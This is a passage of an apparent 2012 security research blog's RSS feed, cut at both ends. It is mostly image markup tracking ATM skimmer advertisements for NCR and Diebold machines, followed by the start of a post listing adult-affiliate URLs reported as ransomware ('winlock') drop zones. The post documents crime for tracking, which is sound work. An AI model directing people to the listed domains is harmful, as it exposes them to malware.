height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-303267842329856823?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/myfullzcom-credit-cardspaypal-shop.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-b9hIMoQIuO4/T6ZdbkGVSOI/AAAAAAAAF6k/q-0MbJ8iJP8/s72-c/06-05-2012+13-15-32.png" height="72" width="72" /><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-6853064496730826228</guid><pubDate>Sun, 06 May 2012 22:33:00 +0000</pubDate><atom:updated>2012-05-07T00:33:36.639+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">NCR</category><category domain="http://www.blogger.com/atom/ns#">Skimmer</category><category domain="http://www.blogger.com/atom/ns#">Skimmers</category><category domain="http://www.blogger.com/atom/ns#">ATM</category><category domain="http://www.blogger.com/atom/ns#">Carding</category><category domain="http://www.blogger.com/atom/ns#">Diebold</category><category domain="http://www.blogger.com/atom/ns#">Skimming</category><title>Tracking Cyber Crime: ATM skimmers (NCR/DIEBOLD)</title><description>"DAB" adv:&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bwnPfHIsO0c/T6buYm8a1OI/AAAAAAAAGAM/FaO87QylbCU/s1600/06-05-2012+23-32-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://3.bp.blogspot.com/-bwnPfHIsO0c/T6buYm8a1OI/AAAAAAAAGAM/FaO87QylbCU/s400/06-05-2012+23-32-43.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;ICQ: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-GyuwuFszjV8/T6bY5vMY4tI/AAAAAAAAF7E/ASH01IsnsF0/s1600/ATM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-GyuwuFszjV8/T6bY5vMY4tI/AAAAAAAAF7E/ASH01IsnsF0/s400/ATM.png" width="269" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;NCR: (images blurred for obvious reason)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YGbnDLUnmac/T6bqPrZW8jI/AAAAAAAAF8I/2hkYISXg-K4/s1600/2012-05-04+05.54.42.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-YGbnDLUnmac/T6bqPrZW8jI/AAAAAAAAF8I/2hkYISXg-K4/s400/2012-05-04+05.54.42.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-9xmcY5OFj_4/T6bqZWxq-kI/AAAAAAAAF8w/hAJRlueXcP4/s1600/2012-05-04+05.55.55.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-9xmcY5OFj_4/T6bqZWxq-kI/AAAAAAAAF8w/hAJRlueXcP4/s400/2012-05-04+05.55.55.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Atk3Y7aNXVs/T6bqXMSCloI/AAAAAAAAF8o/QUtx1Jm3XOw/s1600/2012-05-04+05.55.48.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-Atk3Y7aNXVs/T6bqXMSCloI/AAAAAAAAF8o/QUtx1Jm3XOw/s400/2012-05-04+05.55.48.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-iyvFTIdl2kI/T6bqVKAj0QI/AAAAAAAAF8g/af8Ns7fQN9A/s1600/2012-05-04+05.55.21.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-iyvFTIdl2kI/T6bqVKAj0QI/AAAAAAAAF8g/af8Ns7fQN9A/s400/2012-05-04+05.55.21.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-WLmErb76Pew/T6bqTLAPxbI/AAAAAAAAF8Y/K6t8qaSZYZw/s1600/2012-05-04+05.55.11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-WLmErb76Pew/T6bqTLAPxbI/AAAAAAAAF8Y/K6t8qaSZYZw/s320/2012-05-04+05.55.11.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-dzbVzy-EntI/T6bqRusOK8I/AAAAAAAAF8Q/1UULpARDAik/s1600/2012-05-04+05.54.53.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-dzbVzy-EntI/T6bqRusOK8I/AAAAAAAAF8Q/1UULpARDAik/s400/2012-05-04+05.54.53.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s1600/2012-05-04+05.56.23.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s400/2012-05-04+05.56.23.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s1600/2012-05-04+05.56.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s400/2012-05-04+05.56.39.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s1600/2012-05-04+05.56.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s400/2012-05-04+05.56.51.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s1600/2012-05-04+05.57.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s400/2012-05-04+05.57.22.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-oPgWvdJGH2g/T6bqhpTsP2I/AAAAAAAAF9Y/-4aXHntLOG8/s1600/2012-05-04+05.57.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-oPgWvdJGH2g/T6bqhpTsP2I/AAAAAAAAF9Y/-4aXHntLOG8/s400/2012-05-04+05.57.39.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s1600/2012-05-04+05.57.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-w1oJjskpcWo/T6bqgAdBiRI/AAAAAAAAF9Q/0YC-4_3H3tY/s400/2012-05-04+05.57.22.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s1600/2012-05-04+05.56.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-U3Fd0eB9R9Y/T6bqet0hnyI/AAAAAAAAF9I/4Fb3je7oYE0/s400/2012-05-04+05.56.51.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s1600/2012-05-04+05.56.39.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-KNnvPT2I3mo/T6bqdNCJFKI/AAAAAAAAF9A/uQYgOQA2V9w/s400/2012-05-04+05.56.39.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s1600/2012-05-04+05.56.23.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-vdfWuNMetbY/T6bqbMrxaEI/AAAAAAAAF84/rDOgfnDQJp8/s400/2012-05-04+05.56.23.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-v_aJgSLmT3Q/T6bqkylKvgI/AAAAAAAAF9o/EiQyP6k72Rk/s1600/2012-05-04+05.58.02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-v_aJgSLmT3Q/T6bqkylKvgI/AAAAAAAAF9o/EiQyP6k72Rk/s400/2012-05-04+05.58.02.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-9NCcFM_Ae0Y/T6bqnEBzHpI/AAAAAAAAF9w/KUAnbunTnsY/s1600/2012-05-04+05.58.17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-9NCcFM_Ae0Y/T6bqnEBzHpI/AAAAAAAAF9w/KUAnbunTnsY/s400/2012-05-04+05.58.17.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-pseiAlZeIRc/T6bqo7Ed7ZI/AAAAAAAAF94/55X38Mihhkc/s1600/2012-05-04+05.58.35.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-pseiAlZeIRc/T6bqo7Ed7ZI/AAAAAAAAF94/55X38Mihhkc/s400/2012-05-04+05.58.35.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-m0JM0kNOHgc/T6bqqRaQaTI/AAAAAAAAF-A/eXm-doOnPNk/s1600/2012-05-04+05.59.15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-m0JM0kNOHgc/T6bqqRaQaTI/AAAAAAAAF-A/eXm-doOnPNk/s400/2012-05-04+05.59.15.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-UHthJb7ix1s/T6bqjWQjFoI/AAAAAAAAF9g/Nj5J93UEf0Y/s1600/2012-05-04+05.57.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-UHthJb7ix1s/T6bqjWQjFoI/AAAAAAAAF9g/Nj5J93UEf0Y/s400/2012-05-04+05.57.54.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-O6EhgCRvlxU/T6bqs9HfGbI/AAAAAAAAF-I/pNRvmGTmzVI/s1600/2012-05-04+05.59.26.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-O6EhgCRvlxU/T6bqs9HfGbI/AAAAAAAAF-I/pNRvmGTmzVI/s400/2012-05-04+05.59.26.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-6BZ6lG-SaBM/T6bqvJT_a2I/AAAAAAAAF-Q/ss-682oekG4/s1600/2012-05-04+05.59.42.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-6BZ6lG-SaBM/T6bqvJT_a2I/AAAAAAAAF-Q/ss-682oekG4/s400/2012-05-04+05.59.42.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-NXGwIWj2fSM/T6bqxXYDKOI/AAAAAAAAF-Y/uiiLjjgZ8DA/s1600/2012-05-04+06.00.15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-NXGwIWj2fSM/T6bqxXYDKOI/AAAAAAAAF-Y/uiiLjjgZ8DA/s400/2012-05-04+06.00.15.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-acjPMy2C5Gk/T6bqzVDUqvI/AAAAAAAAF-g/F3wztiQpzq4/s1600/2012-05-04+06.00.24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-acjPMy2C5Gk/T6bqzVDUqvI/AAAAAAAAF-g/F3wztiQpzq4/s400/2012-05-04+06.00.24.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-P6y08M_cWI0/T6bq6WmlRVI/AAAAAAAAF-8/Kw300YTZmrg/s1600/2012-05-04+06.01.26.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-P6y08M_cWI0/T6bq6WmlRVI/AAAAAAAAF-8/Kw300YTZmrg/s400/2012-05-04+06.01.26.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-0IIXmg4ulYs/T6bq44A5rGI/AAAAAAAAF-4/atnvxhz68H4/s1600/2012-05-04+06.01.18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-0IIXmg4ulYs/T6bq44A5rGI/AAAAAAAAF-4/atnvxhz68H4/s400/2012-05-04+06.01.18.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--HFa73GSV44/T6bq21OQ23I/AAAAAAAAF-w/7KvT9-uBsEE/s1600/2012-05-04+06.01.09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/--HFa73GSV44/T6bq21OQ23I/AAAAAAAAF-w/7KvT9-uBsEE/s400/2012-05-04+06.01.09.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-aiz2cFwU2j0/T6bq1DJosSI/AAAAAAAAF-o/NaZ67mw8q9A/s1600/2012-05-04+06.00.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-aiz2cFwU2j0/T6bq1DJosSI/AAAAAAAAF-o/NaZ67mw8q9A/s400/2012-05-04+06.00.54.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9lmnGWYpO9M/T6bq78IDrwI/AAAAAAAAF_E/mDG5tGJDJaw/s1600/2012-05-04+06.01.36.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-9lmnGWYpO9M/T6bq78IDrwI/AAAAAAAAF_E/mDG5tGJDJaw/s400/2012-05-04+06.01.36.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-OlEVZDdF0zg/T6bq9nF7SGI/AAAAAAAAF_Q/AQyEtRON1Ho/s1600/2012-05-04+06.02.01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-OlEVZDdF0zg/T6bq9nF7SGI/AAAAAAAAF_Q/AQyEtRON1Ho/s400/2012-05-04+06.02.01.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-OKd3wApWQS8/T6bq_BmM8GI/AAAAAAAAF_Y/TBqahFyX0Rk/s1600/2012-05-04+06.02.12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-OKd3wApWQS8/T6bq_BmM8GI/AAAAAAAAF_Y/TBqahFyX0Rk/s400/2012-05-04+06.02.12.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-JCCBBYH-TGo/T6brAsyF49I/AAAAAAAAF_g/w-5HM4dLbuQ/s1600/2012-05-04+06.02.27.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-JCCBBYH-TGo/T6brAsyF49I/AAAAAAAAF_g/w-5HM4dLbuQ/s400/2012-05-04+06.02.27.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-s_GVMHvZXeM/T6brCNRkeVI/AAAAAAAAF_o/MIMwrsH9hoQ/s1600/2012-05-04+06.02.41.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-s_GVMHvZXeM/T6brCNRkeVI/AAAAAAAAF_o/MIMwrsH9hoQ/s400/2012-05-04+06.02.41.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-02D_4ynHr3k/T6brEK8r-rI/AAAAAAAAF_w/lVAZKjp5O-w/s1600/2012-05-04+06.02.50.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-02D_4ynHr3k/T6brEK8r-rI/AAAAAAAAF_w/lVAZKjp5O-w/s400/2012-05-04+06.02.50.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QzSMVbmlbFc/T6brF7ScCCI/AAAAAAAAF_4/ZaWveQ46OAs/s1600/2012-05-04+06.03.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-QzSMVbmlbFc/T6brF7ScCCI/AAAAAAAAF_4/ZaWveQ46OAs/s400/2012-05-04+06.03.04.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-EjtJGrqEIRc/T6brHoMplLI/AAAAAAAAGAA/wEVvmOzv2LI/s1600/2012-05-04+06.03.18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-EjtJGrqEIRc/T6brHoMplLI/AAAAAAAAGAA/wEVvmOzv2LI/s400/2012-05-04+06.03.18.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;"skimer4you" adv:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-vuwt35dFkOY/T6bxiN2H0YI/AAAAAAAAGAY/e3lh8aDm5_I/s1600/06-05-2012+23-46-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://2.bp.blogspot.com/-vuwt35dFkOY/T6bxiN2H0YI/AAAAAAAAGAY/e3lh8aDm5_I/s400/06-05-2012+23-46-28.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;ICQ:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-RKD6fHi1gr4/T6bZNVGg6MI/AAAAAAAAF7M/JLWfQkOeItY/s1600/biggie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-RKD6fHi1gr4/T6bZNVGg6MI/AAAAAAAAF7M/JLWfQkOeItY/s400/biggie.png" width="383" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;NCR:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-eGUi3Gm6Dmw/T6baAqzffgI/AAAAAAAAF7U/6bMPJorl1-4/s1600/NCR+%281%29.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-eGUi3Gm6Dmw/T6baAqzffgI/AAAAAAAAF7U/6bMPJorl1-4/s400/NCR+%281%29.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-WIlf4YBSBQU/T6baJ-S7HlI/AAAAAAAAF7c/GSBvTrkB1R4/s1600/NCR+%282%29.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-WIlf4YBSBQU/T6baJ-S7HlI/AAAAAAAAF7c/GSBvTrkB1R4/s400/NCR+%282%29.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Nano: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-h6PKObWn9mk/T6baSOoLeOI/AAAAAAAAF7k/0VVDC8N7a6M/s1600/Nano+2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="248" src="http://4.bp.blogspot.com/-h6PKObWn9mk/T6baSOoLeOI/AAAAAAAAF7k/0VVDC8N7a6M/s400/Nano+2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-79r1AnISiYY/T6baSyKXD-I/AAAAAAAAF7s/mILtO7C9rOw/s1600/Nano.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-79r1AnISiYY/T6baSyKXD-I/AAAAAAAAF7s/mILtO7C9rOw/s400/Nano.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;Diebold:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-EeyuviHGs0M/T6baqc7_SeI/AAAAAAAAF70/jmjWrSy_9SM/s1600/Diebold+%282%29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="215" src="http://3.bp.blogspot.com/-EeyuviHGs0M/T6baqc7_SeI/AAAAAAAAF70/jmjWrSy_9SM/s400/Diebold+%282%29.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-CH_MpqF4F3c/T6bawoEaVnI/AAAAAAAAF78/LXN_4_VDIvQ/s1600/Diebold.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://3.bp.blogspot.com/-CH_MpqF4F3c/T6bawoEaVnI/AAAAAAAAF78/LXN_4_VDIvQ/s400/Diebold.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6853064496730826228?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/tracking-cyber-crime-atm-skimmers.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-bwnPfHIsO0c/T6buYm8a1OI/AAAAAAAAGAM/FaO87QylbCU/s72-c/06-05-2012+23-32-43.png" height="72" width="72" /><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5501254446685370410</guid><pubDate>Sun, 06 May 2012 13:47:00 +0000</pubDate><atom:updated>2012-05-06T15:47:37.217+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">EroDerevo</category><category domain="http://www.blogger.com/atom/ns#">7xVideo</category><category domain="http://www.blogger.com/atom/ns#">15-Minut</category><category domain="http://www.blogger.com/atom/ns#">7xTUBE</category><category domain="http://www.blogger.com/atom/ns#">Adult</category><category domain="http://www.blogger.com/atom/ns#">7xVideo WG1</category><category domain="http://www.blogger.com/atom/ns#">OrgiGuru</category><category domain="http://www.blogger.com/atom/ns#">Affiliate</category><category domain="http://www.blogger.com/atom/ns#">7xVideo D1</category><category domain="http://www.blogger.com/atom/ns#">SexDerevo</category><title>PaySitesClub affiliate recycle malware domains ?</title><description>PaySitesClub is a private adult affiliate program, the domains used to send the traffics are:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://origuru.com/?pid=68&lt;br /&gt;http://15-minut.com/?pid=68&lt;br /&gt;http://sexderevo.com/?pid=68&lt;br /&gt;http://eroderevo.com/?pid=68&lt;br /&gt;http://7xtube.com/?pid=68&lt;br /&gt;http://7xvideo.com/?pid=68&lt;br /&gt;http://7xvideo.com/wg1/?pid=68&lt;/div&gt;&lt;br /&gt;Problem... 7xtube.com/7xvideo was serving as winlock drop zone, and not only the domains, they used also the same templates during the whole campaign.&lt;br /&gt;As well as SexDerevo/EroDerevo for &lt;a 